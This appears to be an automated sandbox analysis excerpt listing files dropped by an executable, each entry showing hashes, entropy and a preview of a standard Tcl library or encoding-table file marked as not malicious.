                                                                                                                                                                                                                              SHA-512:C1727E265A6B0B54773C886A1BCE73512E799BA81A4FCEEEB84CDC33F5505A5E0984E96326A78C46BF142BC4652A80E213886F60EB54ADF92E4DFFE953C87F6B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# auto.tcl --..#..# utility procs formerly in init.tcl dealing with auto execution of commands..# and can be auto loaded themselves...#..# Copyright (c) 1991-1993 The Regents of the University of California...# Copyright (c) 1994-1998 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# auto_reset --..#..# Destroy all cached information for auto-loading and auto-execution, so that..# the information gets recomputed the next time it's needed. Also delete any..# commands that are listed in the auto-load index...#..# Arguments:..# None.....proc auto_reset {} {.. global auto_execs auto_index auto_path.. if {[array exists auto_index]} {...foreach cmdName [array names auto_index] {... set fqcn [namespace which $cmdName]... if {$fqcn eq ""} {....continue... }... rename $fqcn {}...}.. }.. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath.. if {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):133439
                                                                                                                                                                                                                              Entropy (8bit):5.044814789288095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Cbn4IAhYvuCg9epsArAzqpSMpWzP7ejMiIAxBPqGYkPAPaZpHYM8EN4LhVLlarXL:Cbn4IM9epsArSqpSMpWzP7ejM/eBPqG3
                                                                                                                                                                                                                              MD5:88BB44A1364147FDD80F9FD78FBCEF61
                                                                                                                                                                                                                              SHA1:2C3454D2669F0CA83FECF17976D599C85B86E615
                                                                                                                                                                                                                              SHA-256:1947F8B188AB4AB6AA72EA68A58D2D9ADD0894FDF320F6B074EAE0F198368FB7
                                                                                                                                                                                                                              SHA-512:010B13E8A2D50521B5D7ADCC5F32F7CDE3F12E1053961C575D967DC6CFD368640BF45D23832E5E9C3868CDCA9FE0505698F949C5557D4169353634C94AA196B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:#----------------------------------------------------------------------..#..# clock.tcl --..#..#.This file implements the portions of the [clock] ensemble that are..#.coded in Tcl. Refer to the users' manual to see the description of..#.the [clock] command and its subcommands...#..#..#----------------------------------------------------------------------..#..# Copyright (c) 2004-2007 Kevin B. Kenny..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#----------------------------------------------------------------------....# We must have message catalogs that support the root locale, and we need..# access to the Registry on Windows systems.....uplevel \#0 {.. package require msgcat 1.6.. if { $::tcl_platform(platform) eq {windows} } {...if { [catch { package require registry 1.1 }] } {... namespace eval ::tcl::clock [list variable NoRegistry {}]...}.. }..}....# Put the library directory in
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1110
                                                                                                                                                                                                                              Entropy (8bit):2.1033474959326957
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:5c2VBUvEWVrVJ/eyN9j2iV2NdWWT0VbusV7EV7KVAMmVZyd851VFpsGkliX:5HVBUlJvRj7SOVbusZhAMiZyi77qsX
                                                                                                                                                                                                                              MD5:9E3A454FA480E9A99D2D5ACDAA775233
                                                                                                                                                                                                                              SHA1:493637BB570A5C96BB62F998BD0391FB59AFC5F0
                                                                                                                                                                                                                              SHA-256:FB87BF197F4F485B08EA81F7534BC07D9C3A538D022424BE11011A1FE3C413FD
                                                                                                                                                                                                                              SHA-512:EDFCB2BB6AB052D28D5CEBD08AD57F36D3A4CB83D557B1359B0ADE1266E24D8F3CE87B8240881396A5BA4FB45F8B74014784E8885CDB86680D98977CC0D130F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: ascii, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):94389
                                                                                                                                                                                                                              Entropy (8bit):3.3217406555698195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:UAHU3LIkZlmXrd/uQ0ao98zgKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fd:UVduBGf94gFMT6q95GDRBfd
                                                                                                                                                                                                                              MD5:41A874778111CC218BD421CF9C795EC2
                                                                                                                                                                                                                              SHA1:80857D106F71199CE187833D38DB091A819A520C
                                                                                                                                                                                                                              SHA-256:AD1ED201B69855BFD353BF969DFC55576DA35A963ABF1BF7FC6D8B5142A61A61
                                                                                                                                                                                                                              SHA-512:4244624124F86A3EFAB4C70B115A46C8ADF02D708860FA5F327CDBFA24BC3F9EFAD0C6EE58DE96B0B6BBC4CF6D99B322BB8657129007C86D6482F41C1503AAD4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: big5, multi-byte..M..003F 0 89..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):98634
                                                                                                                                                                                                                              Entropy (8bit):2.438904802083714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:MPFOsOKqBLPf62X4lgQeLHj6RHUn0TQb8G47Ianrd28gr:MPAsknjX4OQe7aoMMarAFr
                                                                                                                                                                                                                              MD5:B6A7C59E6A48D91CC2DBCB2BBA7E4510
                                                                                                                                                                                                                              SHA1:16A9338F18202B26981F2028BEA412DD03BB0FF2
                                                                                                                                                                                                                              SHA-256:8924545CC92584169138AADB64683C07BBF846A57014C2E668D23B63F43F3610
                                                                                                                                                                                                                              SHA-512:3D644CF394A528A8699BE3679F787A4E1DAD657C04B810580A4C520F2C043471640FBE080AC46DFD3924C47A73BEE12A6AC69D291D09EB791AD0D64A73750B43
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cns11643, double-byte..D..2134 0 93..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00004E284E364E3F4E854E054E04518251965338536953B64E2A4E874E4951E2..4E464E8F4EBC4EBE516651E35204529C53B95902590A5B805DDB5E7A5E7F5EF4..5F505F515F61961D4E3C4E634E624EA351854EC54ECF4ECE4ECC518451865722..572351E45205529E529D52FD5300533A5C735346535D538653B7620953CC6C15..53CE57216C3F5E005F0C623762386534653565E04F0E738D4E974EE04F144EF1..4EE74EF74EE64F1D4F024F054F2256D8518B518C519951E55213520B52A60000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.3578844928761034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CqHVBUlJvRj7SOVbusZhAMiZyi77q8ujr4z8tjsuVO6ys2K:JMlBVnrAMiwMm8ujr4z8emTys2K
                                                                                                                                                                                                                              MD5:9568EDE60D3F917F1671F5A625A801C4
                                                                                                                                                                                                                              SHA1:4F5B3308FE7F6845B46779DECF9B395E47AC7396
                                                                                                                                                                                                                              SHA-256:E2991A6F7A7A4D8D3C4C97947298FD5BACB3EAA2F898CEE17F5E21A9861B9626
                                                                                                                                                                                                                              SHA-512:9C32BE3E25FC2211CE91F7B9AE1F9EBA20071272BE2BBBA63A8B6E3CD6543C4C32CD62C4C4D153C94F5BE212E974A61EEFD70DDC005F1688D09D9D56E8E298A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1250, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC0081201A0083201E2026202020210088203001602039015A0164017D0179..009020182019201C201D202220132014009821220161203A015B0165017E017A..00A002C702D8014100A4010400A600A700A800A9015E00AB00AC00AD00AE017B..00B000B102DB014200B400B500B600B700B80105015F00BB013D02DD013E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300E40
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.358948900439905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:CTHVBUlJvRj7SOVbusZhAMiZyi77qpREwKsF/+++SAJlz9aRme3cJI:wMlBVnrAMiwMmpKwKm/EYnsJI
                                                                                                                                                                                                                              MD5:83DAF47FD1F87B7B1E9E086F14C39E5B
                                                                                                                                                                                                                              SHA1:77AE330512EBFEF430A02213644BD1CFCE174298
                                                                                                                                                                                                                              SHA-256:0AA66DFF8A7AE570FEE83A803F8F5391D9F0C9BD6311796592D9B6E8E36BE6FC
                                                                                                                                                                                                                              SHA-512:D7CE2F44EDFE1DA6D3E07E9A41BB08AD42430BAAFADD09FD217F4B524323A01A1F4913B640C552D38AAEBFF75B0D50ED7A813A2A57C4019311158890C0162DF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: cp1251, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..04020403201A0453201E20262020202120AC203004092039040A040C040B040F..045220182019201C201D202220132014009821220459203A045A045C045B045F..00A0040E045E040800A4049000A600A7040100A9040400AB00AC00AD00AE0407..00B000B104060456049100B500B600B704512116045400BB0458040504550457..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..043004310432043304340
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.4954458011071323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8dOHVBUlJvRj7SOVbusZhAMiZyi77qJlbaBMD2aSY5us36Ekp1ysOSU2imR:8kMlBVnrAMiwMm7aKPVusqx1ysOJjmR
                                                                                                                                                                                                                              MD5:0CC92F685A4132BE4B030006670D81CE
                                                                                                                                                                                                                              SHA1:13B1074A90055E9EA061A6206A9C004DA29967A9
                                                                                                                                                                                                                              SHA-256:1AABE561B5C944ABD11C293D4ACAC0F3A4A5A9E84A0342D066F4E3E992348895
                                                                                                                                                                                                                              SHA-512:E1AF3D47D681CD68B6063DEC1241631CABE86FE835232FA73D855AC74D0175540D46511282BE7198A67A37970A5D05CDECF55C10424ED9C1413C108F116094D9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macGreek, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8..00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC..2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7..039100B12264226500A503920395039603970399039A039C03A603AB03A803A9..03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153..20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F..03CD03B103B203C803B
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3991839018654573
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8KHVBUlJvRj7SOVbusZhAMiZyi77qscqMVmOZmk/LYRldjY/g4JyMWG:8KMlBVnrAMiwMmzqi/LYRlYBEXG
                                                                                                                                                                                                                              MD5:747ADBE54D6992467415E322326FA1B9
                                                                                                                                                                                                                              SHA1:5E3967B5DDF3A6DBF07E90ED6B9B9C2F3F3F35FE
                                                                                                                                                                                                                              SHA-256:6FD08CE6FBA521D51E8058DE5C2DBD6583B80306A8BE7D015361F76314E70A35
                                                                                                                                                                                                                              SHA-512:A04B946993985BF1F8FBA3A7A9AD3838F43F8F27F69B1FB1015D9DC8612AAFCE24E30CBC1FCABBDFB359FD487D51F70F18DA0CDA4A87749A2C82309CEB054849
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macIceland, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE..00FD00B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48813
                                                                                                                                                                                                                              Entropy (8bit):3.3767502114972077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:K/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSJi:KVUidzJCurDGSk
                                                                                                                                                                                                                              MD5:3DCD22325E0194AAD4959C939B1DE24D
                                                                                                                                                                                                                              SHA1:ABEF1372FBDA83714CE29E015D9A198D4B37B21C
                                                                                                                                                                                                                              SHA-256:47007D9EBF4D34C6CE3599E50AFC7C1CF8129B88994DE2C2A857C09003F9CD2B
                                                                                                                                                                                                                              SHA-512:B8ADFD2315EA38E5F7D4DED219759380069AAB539F1B5AAA5626CE32428CBBEB5E8215AD8351E023BCF72FA4DC30AB40CF59D6D45E33B6D1A6B41BEBFD4BD4C2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macJapan, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.4060725247347516
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8THVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldjBpmg4JyMWG:8TMlBVnrAMiwMmOi/LYRlTsBEXG
                                                                                                                                                                                                                              MD5:34691FADC788B85D98F63159640C7DD0
                                                                                                                                                                                                                              SHA1:C8B3D084D3E831EFF6ECEF71B2029545F214C3D4
                                                                                                                                                                                                                              SHA-256:C83D971D6BC0284EF323C197896E38C57A5FF44784E451EC2997EDA70C0DD85C
                                                                                                                                                                                                                              SHA-512:77D5676F9B7AF7FD1D612A1C426889D8F2C0191887E180B78C4AA42202928A1B3078B76BD3C5F5ABB2A5CE1AE913E3CA6EFDE0483D2A2B0EFC173EF25EAE1D67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macRoman, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02..202100B7201A201E203
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.412326247178521
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8tHVBUlJvRj7SOVbusZhAMiZyi77qsTMVZ5OZwYRldj/T9g4JyMWG:8tMlBVnrAMiwMmOA7YRlFT9BEXG
                                                                                                                                                                                                                              MD5:04E25073BFB0019D8381B72F7B433F00
                                                                                                                                                                                                                              SHA1:B63B0AD9F10A44B0DDD12A3BDBCDEB2992D6D385
                                                                                                                                                                                                                              SHA-256:0B805DAF21D37D702617A8C72C7345F857695108D905FF378791F291CEA150F0
                                                                                                                                                                                                                              SHA-512:0514EC054676C15C65B01B02747CDBAD79BC89FD1A24A17797A8729752FB748FEDBE920E7BBFF41A6DA4BA99002E3B8DB674D53E30485DC36F6BF737EAF11702
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macRomania, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E..221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163..202100B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.6062142626989004
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:88HVBUlJvRj7SOVbusZhAMiZyi77qqJipJwHmEU4AyqU+TpH:88MlBVnrAMiwMmqJ8Jf4AyqUe
                                                                                                                                                                                                                              MD5:06DC6BA6E4A75CD7FF2D7A4248912C61
                                                                                                                                                                                                                              SHA1:23FB16763A8F11EF48E805E4F453C2F812D48FC4
                                                                                                                                                                                                                              SHA-256:A1802A2FEB01B255EC7C17425EEE4525372DF8CE226F4047D149172EB438F913
                                                                                                                                                                                                                              SHA-512:41A487EC5C36C17B2746C5DC770882A836E6E75CF6A14C31595EB211022F0476BD3B953497C447F21554769F127C3A56E5B6EF8FB3C20A8AFF8C67E0CC94359D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macThai, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899..FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F..0E400E410E420E430E44
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.422718883614008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8QjHVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldD8g4JyS:88MlBVnrAMiwMmOi/LYRlWBES
                                                                                                                                                                                                                              MD5:4EA94A0DB35BED2081A2CC9D627A8180
                                                                                                                                                                                                                              SHA1:AB2AC3ADA19F3F656780FF876D5B536A8DCE92C6
                                                                                                                                                                                                                              SHA-256:AFB66138EBE9B87D8B070FE3B6E7D1A05ED508571E9E5B166C3314069D59B4E4
                                                                                                                                                                                                                              SHA-512:7888F560D3728732BE1B7DCE49ECB61F3399CEF11191F4116C891E1D147B2A90ED8FB4A5E7B51904A001C47750BD9EB1B15EA5BA5B4EC5D69CDE7704B69529AD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: macTurkish, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178011E011F01300131015E015F..202100B7201A201E2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.4157626428238723
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8TzHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJd:8PMlBVnrAMiwMm8Y6zUk+UVsJd
                                                                                                                                                                                                                              MD5:A5B48D6F2678579CBE6EA094A4655071
                                                                                                                                                                                                                              SHA1:A13A41D530B21CE8443AFD7E811286537C5BA9C7
                                                                                                                                                                                                                              SHA-256:F7E11736C9FF30102B31EC72272754110193B347433F4B364921E8F131C92BF0
                                                                                                                                                                                                                              SHA-512:612F9D528CE940B5CA9E67CB127013A104655207511F4CF39C8696A127E6A8F4867F5603DCFB78C25A55668C6EE70F2997A8D1626F6F1DD44B19260967F17097
